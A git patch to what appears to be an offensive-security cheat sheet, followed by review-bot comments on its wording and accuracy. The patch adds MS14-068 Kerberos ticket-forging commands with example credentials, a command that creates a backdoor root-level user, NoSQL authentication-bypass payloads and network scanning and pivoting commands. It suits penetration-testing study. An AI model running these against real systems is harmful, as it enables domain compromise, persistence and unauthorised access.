From 144b3827ab19b409dd4a425812bc13ec37330d8b Mon Sep 17 00:00:00 2001 From: Swissky Date: Sat, 29 Jun 2019 17:55:13 +0200 Subject: [PATCH] MS14-068 + /etc/security/opasswd --- .../Active Directory Attack.md | 69 ++++++++++++++++--- .../Linux - Persistence.md | 1 + .../Linux - Privilege Escalation.md | 11 ++- .../Network Discovery.md | 3 + .../Network Pivoting Techniques.md | 8 +++ NoSQL Injection/README.md | 29 ++++++-- Server Side Request Forgery/README.md | 4 +- 7 files changed, 108 insertions(+), 17 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7c6bb5c..0ee416d 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -101,23 +101,73 @@ ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) -```bash -Exploit Python: https://www.exploit-db.com/exploits/35474/ -Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 -Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum +This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine. -git clone https://github.com/bidord/pykek +```powershell +# remote +rpcclient $> lookupnames john.smith +john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) + +# loc +wmic useraccount get name,sid +Administrator S-1-5-21-3415849876-833628785-5197346142-500 +Guest S-1-5-21-3415849876-833628785-5197346142-501 +Administrator S-1-5-21-297520375-2634728305-5197346142-500 +Guest S-1-5-21-297520375-2634728305-5197346142-501 +krbtgt S-1-5-21-297520375-2634728305-5197346142-502 +lambda S-1-5-21-297520375-2634728305-5197346142-1110 +``` + +```bash +Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 +``` + +Generate a ticket with `metasploit` or `pykek` + +```powershell +Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum + Name Current Setting Required Description + ---- --------------- -------- ----------- + DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL + PASSWORD P@ssw0rd yes The Domain User password + RHOSTS 10.10.10.10 yes The target address range or CIDR identifier + RPORT 88 yes The target port + Timeout 10 yes The TCP timeout to establish connection and read data + USER lambda yes The Domain User + USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000 +``` + +```powershell +# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek +git clone https://github.com/SecWiki/windows-kernel-exploits python ./ms14-068.py -u @ -s -d -p python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! 
-s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org +python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10 +``` + +Then use `mimikatz` to load the ticket. + +```powershell mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" ``` +:warning: If the clock is skewed use `clock-skew.nse` script from `nmap` + +```powershell +$ nmap -sV -sC 10.10.10.10 +clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s + +$ sudo date -s "14 APR 2015 18:25:16" +``` + + ### Open Shares ```powershell -smbmap -H 10.10.10.100 # null session -smbmap -H 10.10.10.100 -R # recursive listing -smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 +smbmap -H 10.10.10.10 # null session +smbmap -H 10.10.10.10 -R # recursive listing +smbmap -H 10.10.10.10 -u invaliduser # guest smb session +smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 ``` or 
@@ -653,4 +703,5 @@ Most of the time the best passwords to spray are : * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) * [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) -* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) \ No newline at end of file +* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) +* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index 45ec556..567987b 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -29,6 +29,7 @@ ncat --tcp -lvp 4242 ```powershell sudo useradd -ou 0 -g 0 john sudo passwd john +echo "linuxpassword" | passwd --stdin john ``` ## Suid Binary diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index f46d0ea..f017fae 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md 
@@ -15,6 +15,7 @@ * [Checklist](#checklist) * [Looting for passwords](#looting-for-passwords) * [Files containing passwords](#files-containing-passwords) + * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd) * [Last edited files](#last-edited-files) * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) @@ -133,6 +134,13 @@ grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; ``` +### Old passwords in /etc/security/opasswd + +The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them. + +:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes + + ### Last edited files Files that were edited in the last 10 minutes @@ -614,4 +622,5 @@ https://www.exploit-db.com/exploits/18411 - [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) -- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) \ No newline at end of file +- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) +* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) \ No newline at end of file 
diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index 1a0b976..ab07f1a 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -102,6 +102,9 @@ List Nmap scripts : ls /usr/share/nmap/scripts/ ```powershell masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 + +masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp +masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst ``` ## Reconnoitre diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index a1be0ec..95e9974 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -138,7 +138,15 @@ route flush ## sshuttle +Transparent proxy server that works as a poor man's VPN. Forwards over ssh. + +* Doesn't require admin. +* Works with Linux and MacOS. +* Supports DNS tunneling. + ```powershell +pacman -Sy sshuttle +apt-get install sshuttle sshuttle -vvr user@10.10.10.10 10.1.1.0/24 sshuttle -vvr username@pivot_host 10.2.2.0/24 ``` diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 130f735..3714a3f 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md 
@@ -1,9 +1,28 @@ # NoSQL injection -NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. +> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. + +## Summary + +* [Tools](#tools) +* [Exploit](exploits) + * [Authentication Bypass](#authentication-bypass) + * [Extract length information](#extract-length-information) + * [Extract data information](#extract-data-information) +* [Blind NoSQL](#blind-nosql) + * [POST with JSON body](#post-with-json-body) + * [GET](#get) +* [MongoDB Payloads](#mongodb-payloads) +* [References](#references) + +## Tools + +* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) ## Exploit +### Authentication Bypass + Basic authentication bypass using not equal ($ne) or greater ($gt) ```json @@ -17,14 +36,14 @@ in JSON {"username": {"$gt":""}, "password": {"$gt":""}} ``` -Extract length information +### Extract length information ```json username[$ne]=toto&password[$regex]=.{1} username[$ne]=toto&password[$regex]=.{3} ``` -Extract data information +### Extract data information ```json in URL 
@@ -124,5 +143,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/) * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection) -* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists) -* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb) +* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists) +* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 70bb50c..facf5a3 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -217,7 +217,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/ http://127.1.1.1:80#\@127.2.2.2:80/ ``` -![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/WeakParser.jpg) +![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) ## SSRF exploitation via URL Scheme @@ -243,7 +243,7 @@ ssrf.php?url=http://127.0.0.1:80 ssrf.php?url=http://127.0.0.1:443 ``` -![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/SSRF_stream.png) +![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true) The following URL scheme can be used to probe the network
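Review bot: In the MS14-068 hunk of Active Directory Attack.md, the pykek usage line `python ./ms14-068.py -u @ -s -d -p` has lost its argument placeholders (user@domain, SID, DC address, password) and should be restored, and the later `mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"` line still names the darthsidious ticket while the newly added example generates one for john.smith@pwn3d.local, so the reader cannot see which file to load; pykek names the output `TGT_<user>@<domain>.ccache`, so the mimikatz line should follow the same example. Smaller points: "This exploit require to know the user SID" should read "This exploit requires the user's SID"; "# loc" should be "# local"; the block mixes a Samba `rpcclient` session with a Windows `wmic` command under a single ```powershell fence, so split it into two blocks with the right language tag (the nmap and `date` block is a Linux shell block as well); and the lone "Doc:" URL does not need a code fence, a plain markdown link reads better. Note also that `sudo date -s "14 APR 2015 18:25:16"` moves the whole system clock of the attacking host, not just the ticket timestamp, which disturbs logging and certificate validation there; the text should say to reset the clock afterwards.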
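Review bot: In the references hunk of Active Directory Attack.md, the file still ends without a trailing newline (`\ No newline at end of file` appears on both sides of the hunk); add one so that the next appended reference does not show up as a change to the previous line.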
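Review bot: In the Linux - Persistence.md hunk, `echo "linuxpassword" | passwd --stdin john` only works on Red Hat-derived systems; the Debian/Ubuntu `passwd` has no `--stdin` option. The portable form is `echo 'john:linuxpassword' | sudo chpasswd`, and like the preceding `sudo passwd john` line it needs root, which the new line omits. The block is also fenced as ```powershell although it holds Linux shell commands. From the defender's side, the `-ou 0` account created two lines above is a second UID-0 user and is the thing to look for, e.g. `awk -F: '$3 == 0' /etc/passwd`; a sentence saying so would make the section useful for both audiences.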
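Review bot: In the table-of-contents hunk of Linux - Privilege Escalation.md, the new anchor `#old-passwords-in--etc-security-opasswd` will most likely not resolve on GitHub: its heading-to-anchor rule drops punctuation such as `/` rather than replacing it with a hyphen, so the heading "Old passwords in /etc/security/opasswd" becomes `#old-passwords-in-etcsecurityopasswd`. Check the rendered page and fix the link.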
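Review bot: In the "Old passwords in /etc/security/opasswd" hunk of Linux - Privilege Escalation.md, "is used also by pam_cracklib to keep the history" should read "is also used ... to keep the history", and the module credit is off: the history in opasswd is written by pam_unix's `remember=N` option (or by pam_pwhistory); pam_cracklib only enforces password quality. The section should also tell the reader when the file exists and how to check, since it is only populated when password history is enabled in the PAM stack and is readable by root only (`ls -l /etc/security/opasswd`). The warning that the file holds password hashes is the right point for defenders; saying that the hashes are of previous passwords, which are often reused elsewhere, makes clear why the file deserves the same protection as /etc/shadow.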
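Review bot: In the references hunk of Linux - Privilege Escalation.md, the existing list uses `-` as the bullet marker but the new pam_cracklib entry uses `*`; keep one marker so markdown renders a single list. The file also still lacks a trailing newline.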
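Review bot: In the Network Discovery.md hunk, the two new masscan lines use `$ROUTER_IP`, `$NETWORK` and `$MACHINE_IP` without defining them anywhere in the block, and `-oL $MACHINE_IP/scans/masscan-ports.lst` assumes that directory already exists (masscan cannot create it). Either add `export` lines with placeholder values and a `mkdir -p $MACHINE_IP/scans`, or say in a comment that these are variables the reader sets. The fence is tagged ```powershell for what is a Linux shell block.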
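Review bot: In the Network Pivoting Techniques.md hunk, the bullet "Doesn't require admin." is wrong as written: sshuttle needs root on the local client (it invokes sudo) to install the iptables or pf redirect rules; what it does not need is root on the remote ssh host. Suggested wording: "Doesn't require admin on the remote host; needs root locally for the firewall rules." Also "MacOS" should be "macOS", and the two install lines (`pacman -Sy sshuttle`, `apt-get install sshuttle`) would read better with a comment naming the distribution each applies to. The block is fenced as ```powershell although it is a Linux shell block.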
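Review bot: In the first hunk of NoSQL Injection/README.md, the Summary entry `[Exploit](exploits)` is missing the `#`: as written it links to a relative path named `exploits`, while the heading it targets is "## Exploit", so the link should be `[Exploit](#exploit)`. The new "### Extract length information" and "### Extract data information" headings sit above fences tagged ```json whose contents (`username[$ne]=toto&password[$regex]=.{1}`) are URL-encoded query strings, not JSON; a `text` tag would be accurate. The blockquote around the introduction is fine but the paragraph reads as the page's own text, so consider citing its source if it is a quotation.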
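Review bot: In the first Server Side Request Forgery/README.md hunk, the image alt text is itself a URL and it points at a different file (`SSRF_Parser.png`) than the image source (`WeakParser.jpg`); use a descriptive alt text such as "Weak URL parser behaviour" and confirm that WeakParser.jpg is the image intended here. Switching both image links to the `blob/...?raw=true` form after the directory rename is fine.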